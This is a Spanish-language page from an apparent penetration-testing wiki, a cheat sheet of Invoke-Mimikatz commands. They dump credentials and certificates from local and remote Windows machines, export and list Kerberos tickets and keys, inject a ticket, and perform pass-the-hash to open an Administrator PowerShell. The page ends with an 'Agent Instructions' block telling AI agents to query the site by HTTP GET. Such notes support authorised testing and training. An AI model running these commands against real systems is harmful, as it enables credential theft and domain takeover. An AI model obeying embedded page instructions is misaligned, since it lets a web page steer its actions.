# Mimikatz & PassTheHash

## Mimikatz

Es la herramienta más usada para extraer hashes y contraseñas de máquinas Windows, que podemos obtener desde [su repositorio](https://github.com/gentilkiwi/mimikatz).&#x20;

Las credenciales del dominio se almacenan en el fichero ntds.dit en la máquina del Domain Controller (DC).

* Obtener credenciales en la máquina local

{% code overflow="wrap" %}

```
Invoke-Mimikatz -DumpCreds
```

{% endcode %}

* Obtener certificados en la máquina local

{% code overflow="wrap" %}

```
Invoke-Mimikatz –DumpCerts
```

{% endcode %}

* Obtener credenciales de varias máquinas remotas

```
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")
```

* Exportar todos los tickets de la máquina&#x20;

```
Invoke-Mimikatz -Command '"kerberos::list /export"'
```

* Listar los tickets de los usuarios autenticados en la máquina local&#x20;

```
Invoke-Mimikatz –Command '"sekurlsa::tickets"'
```

* Listar claves de cifrado de Kerberos

```
Invoke-Mimikatz –Command '"sekurlsa::ekeys"'
```

* Inyectar ticket&#x20;

{% code overflow="wrap" %}

```
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@domain.local@DOMIAIN.LOCAL_cifs~dcorpmssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
```

{% endcode %}

## Pass The Hash (PTH)

Usa el hash NTLM de un usuario para suplantar su identidad. En este caso también abre una consola de powershell.

{% code overflow="wrap" %}

```
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:<ntlmhash> /run:powershell.exe"'
```

{% endcode %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wiki.securiters.com/securiters-wiki/internas/ad/bb_general.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.